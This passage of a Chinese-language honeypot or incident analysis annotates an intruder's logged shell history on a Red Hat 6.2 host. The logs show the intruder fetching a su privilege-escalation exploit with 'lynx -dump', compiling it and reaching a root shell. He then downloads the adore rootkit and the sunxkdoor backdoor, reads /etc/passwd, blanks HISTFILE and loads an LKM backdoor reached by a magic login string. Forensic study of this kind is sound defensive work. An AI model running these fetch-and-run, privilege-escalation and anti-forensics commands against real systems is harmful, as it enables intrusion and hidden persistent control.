4.第二次本地越权尝试
重新换了个本地越权程序,编译后又立即把它删除了?
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 cd ~tom
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 cat > su.c
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 gcc -o su su.c
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:06 -bash: HISTORY: PID=1322 UID=500 rm -rf su.c
原来是编译的时候出错了。源代码中有些字符在用cat 重定向粘贴的时候出了
问题:
[tom@abc tom]$ ggcccc - -oo ssuu susu..cc
su.c:101: unterminated character constant
Sinbad Technical Publications Page 5
换种方式,vi 一个新文件,往里面贴:
2004-9-21 17:06 -bash: HISTORY: PID=1322 UID=500 vi su.c
2004-9-21 17:07 -bash: HISTORY: PID=1322 UID=500 gcc -o su su.c
这次的效果更加不好,出现了三个错误。同时我们也注意到,记录下来的的输入命令部分有大量的 [A、[D 字符,这其实是在用上下键寻找刚才敲过的历史命令“gcc –o su su.c”,看来他是够懒的
[tom@abc tom]$ [Avi su.c[A[D[D[D[D[D[D[D[4@rm -rf su.c[A[D[D[D[D[D[D[D[D[D[D[Dls[K[A[D[Dgcc -o su su.c
su.c:107: unterminated character constant
su.c:523: unterminated string or character constant
su.c:130: possible real start of unterminated constant
又留下一句话“以后有空再搞”,走了。周末下午的5 点多,应该有活动吧:
2004-9-21 17:09 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:10 -bash: HISTORY: PID=1322 UID=500 rm -rf *.c
2004-9-21 17:10 -bash: HISTORY: PID=1322 UID=500 echo kao,yihou you kong zai gao >> haha.txt
2004-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 w
2004-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 ls -al
2004-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 cat .bash_history
2004-9-21 17:13 -bash: HISTORY: PID=1322 UID=500 cat /etc/passwd
2004-9-21 17:16 -bash: HISTORY: PID=1322 UID=500 exit
5.第三次本地越权尝试
两天后,我的朋友又来了。是一个周一的下午,上班时间,看来他的工作不是很忙。这就是“搞机器”一族的共同特点:拥有大量的时间和精力。
2004-9-23 13:28 in.telnetd[5567]: connect from 210.X.X.X
2004-9-23 13:28 PAM_pwdb[5568]: (login) session opened for user tom by(uid=0)
2004-9-23 13:28 login: LOGIN ON 1 BY tom FROM 210.X.X.X
Sinbad Technical Publications Page 6
这次他吸取了教训,试图用wget 直接从网上下载,不过我的系统好像没有装wget,或者PATH 值不对,最后他改用lynx 加-dump 参数成功的从国内一个hack.co.za 的镜像站点下载了利用/bin/su 的越权程序su.c,编译后执行,终于获得了本地root权限:
2004-9-23 13:29 -bash: HISTORY: PID=5569 UID=500 w
2004-9-23 13:29 -bash: HISTORY: PID=5569 UID=500 ps -ef
2004-9-23 13:32 -bash:HISTORY: PID=5569 UID=500 wget _hack_co_za/redhat/5.1/su.c">http://www.safechina.net/www_hack_co_za/redhat/5.1/su.c
2004-9-23 13:34 -bash: HISTORY: PID=5569 UID=500 lynx
2004-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 lynx -dump _hack_co_za/redhat/5.1/su.c">http://www.safechina.net/www_hack_co_za/redhat/5.1/su.c > su.c
2004-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 gcc -o su su.c
2004-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 ./su
su exploit by XP
Enjoy!
Phase 1. Checking paths and write permisions
Checking for /usr/bin/msgfmt...Ok
Checking for /usr/bin/objdump...Ok
Checking write permisions on /tmp...Ok
Checking read permisions on /bin/su...Ok
Checking for a valid language... [using af_ZA] Ok
Checking that /tmp/LC_MESSAGES does not exist...Ok
Phase 2. Calculating eat and pad values
......................................................................done
eat = 120 and pad = 2
Phase 3. Creating evil libc.mo and setting enviroment
vars
Phase 4. Getting address of .dtors section of /bin/su
..........................................done
.dtors is at 0x0804bd3c
Phase 5. Compiling suid shell
/tmp/xp created Ok
Phase 6. Executing /bin/su
- Entering rootshell ;-) -
sh-2.03# iid
Snort也报警提示他获得了root权限:
2004-9-23 13:37 snort[1852]: [1:498:3] ATTACK RESPONSES id check returned root [Classification:
Potentially Bad Traffic] [Priority: 2]: {TCP} 10.0.0.1:23 -> 210.x.x.x:4560
Sinbad Technical Publications Page 7
6.安装后门
成功取得最高权限后,我的朋友开始下载adore rootkit和一个叫做sunxkdoor的后门程序:
2004-9-23 13:39 sh: HISTORY: PID=7046 UID=0 lynx -dump http://stealth.7350.org/rootkits/adore-0.52.tgz > 1.tgz
2004-9-23 13:47 sh: HISTORY: PID=7046 UID=0 lynx -dump http://www.sunx.org/mysoft/sunxkdoor.tar > 1.tar
不过这次又失败了,重定向的文件都是0 字节。因为在越权获得的这个shell中,lynx并不能正常的工作:
sh-2.03# lynx -dump http://stealth.7350.org/rootkits/adore-0.52.tgz >> 1.tgz
Your terminal lacks the ability to clear the screen or position the cursor.
sh-2.03# llyynnxx --dduummpp http:h//www.sunx.org/mysoft/sunxkdoor.tarttp://www.sunx.org/mysoft/sunxkdoor.tar >> 11..ttarar
Your terminal lacks the ability to clear the screen or position the cursor.
sh-2.03# lls s-a l
-al
total 4
drwxr-xr-x 2 tom tom 1024 Sep 22 21:43 .
drwxrwxrwt 5 root root 1024 Sep 22 21:35 ..
-rw-rw-r-- 1 root root 0 Sep 22 21:43 1.tar
-rw-rw-r-- 1 root root 0 Sep 22 21:37 1.tgz
-rw-rw-r-- 1 root root 0 Sep 22 21:37 adore.tgz
-rwxrwxrwx 1 tom tom 458 Sep 22 21:35 libc.mo
-rw-rw-r-- 1 tom tom 428 Sep 22 21:35 libc.po
sh-2.03# rrm m --rrff **
多次失败之后,他退出了rootshell 返回到正常的终端下,成功的用lynx 分别下载了一个攻击telnet 守护进程的telnetd.c 保存为1.c、adore rootkit 保存为
1.tgz、sunxkdoor 后门保存为2.tar:
sh-2.03# eexxiitt
exit
Sinbad Technical Publications Page 8
Phase 7. Cleaning enviroment
rm: cannot unlink `/tmp/xp': Operation not permitted
2004-9-23 14:03 -bash: HISTORY: PID=5569 UID=500 lynx -dump linux-secure.net/pliki/exploits/telnetd/telnetd.c">http://www.linux-secure.net/pliki/exploits/telnetd/telnetd.c> 1.c
2004-9-23 14:04 -bash: HISTORY: PID=5569 UID=500 lynx -dump http://stealth.7350.org/rootkits/adore-0.52.tgz> 1.tgz
2004-9-23 14:04 -bash: HISTORY: PID=5569 UID=500 ls -al
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 tar zxfv 1.tgz
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 cd adore
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 ls
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 ./configure
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 make
2004-9-23 14:06 -bash: HISTORY: PID=5569 UID=500 ls
2004-9-23 14:07 -bash: HISTORY: PID=5569 UID=500 cd ..
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 lynx -dump http://www.sunx.org/mysoft/sunxkdoor.tar > 2.tar
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 ls -al
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 export HISTFILE=/dev/null
下面开始安装sunxkdoor 这个LKM 的后门,这需要root权限,他再次运行su的越权程序获得rootshell,然后用insmod加载sunxkdoor,便退出了系统利用这个后门绕开登录过程进来了。
此后门应该是截获了原有/bin/login 的调用,先是telnet 到系统,在login:提示符后输入sunxkdoor 这个关键串,系统自动断开连接;接着再telnet,就直接获得root的#号提示符。
注意,他把下载的三个后门程序都移到tom主目录下新建的TOM目录中了。
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 ./su
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 pwd
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 cd ~tom
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 tar xfv 2.tar
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 export HISTFILE=/dev/null
2004-9-23 14:12 sh: HISTORY: PID=8570 UID=0 cd sunxkdoor
2004-9-23 14:12 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:13 sh: HISTORY: PID=8570 UID=0 gcc -O2 -c sunxknlsh_linux_II.c
2004-9-23 14:13 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 mv sunxknlsh_linux_II.o ../sun.o
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 cd ..
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 w
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 rm -rf sunxkdoor
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
Sinbad Technical Publications Page 9
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 mkdir TOM
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 mv * TOM
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 cd TOM
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:16 sh: HISTORY: PID=8570 UID=0 insmod
2004-9-23 14:16 sh: HISTORY: PID=8570 UID=0 whereis insmod
2004-9-23 14:17 sh: HISTORY: PID=8570 UID=0 /sbin/insmod sun.o
2004-9-23 14:17 sh: HISTORY: PID=8570 UID=0 /sbin/lsmod
2004-9-23 14:17 sh: HISTORY: PID=8570 UID=0 exit
2004-9-23 14:17 -bash: HISTORY: PID=5569 UID=500 exit
2004-9-23 14:17 PAM_pwdb[5568]: (login) session closed for user tom
#'!
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
login: ssuunnxkxkddooroor
#'!
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
[root@abc /]# ccd d ~~ttomom
[root@abc tom]# llss
